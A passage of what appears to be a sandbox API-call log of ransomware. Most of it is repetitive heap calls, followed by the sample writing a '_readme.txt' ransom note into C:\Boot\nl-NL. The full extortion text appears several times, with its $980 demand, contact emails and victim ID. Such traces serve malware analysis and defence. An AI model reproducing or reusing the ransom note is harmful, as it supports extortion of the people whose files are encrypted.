(HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.829] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.829] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.829] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.829] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.830] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.830] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.830] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.830] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.830] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.830] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.830] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.830] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.830] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.830] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.830] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.830] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.830] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.830] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.830] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.830] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.830] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.830] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.830] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.830] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.830] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.830] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.830] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.830] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.830] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.830] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.830] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.830] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.830] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.831] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.831] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.831] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.831] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.831] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.831] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.831] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.831] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.831] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.831] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.831] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.831] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.831] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.831] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.831] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.831] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.831] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.831] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.831] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.831] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.831] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.831] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.831] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.831] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.831] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.831] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.831] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.831] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.831] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.832] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.832] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.832] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.832] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.832] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.832] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.832] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.832] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.832] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.832] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.832] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.832] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.832] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.832] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.832] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.832] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.833] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.833] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.833] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.833] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.833] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.833] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.833] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.833] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.833] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.833] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.833] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.833] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aaf2b8 [0142.833] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.833] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.834] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.834] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.834] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.834] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.834] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.834] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.834] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.834] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.834] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.834] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aaf2b8 [0142.834] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.834] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.834] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.834] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aaf2b8 [0142.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.835] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.835] PathFindFileNameW (pszPath="C:\\Boot\\nl-NL\\") returned="nl-NL\\" [0142.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.835] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0142.835] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0142.835] PathFindFileNameW (pszPath="") returned="" [0142.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1cf8 [0142.835] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0142.836] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0142.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x3221ae8 [0142.836] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3221ae8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0142.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x9aaf2b8 [0142.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.836] FreeLibrary (hLibModule=0x759d0000) returned 1 [0142.836] PathAppendW (in: pszPath="C:\\Boot\\nl-NL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 1 [0142.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.836] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.836] PathFileExistsW (pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 0 [0142.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x9ad6f98 [0142.838] lstrcpyW (in: lpString1=0x9ad6f98, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d" [0142.838] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d", lpString2="9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR" [0142.838] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9ab03c8 [0142.838] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\_readme.txt" (normalized: "c:\\boot\\nl-nl\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6f0 [0142.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x3221ae8 [0142.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x85b) returned 0x325d510 [0142.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", cchWideChar=-1, lpMultiByteStr=0x325d510, cbMultiByte=2139, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal 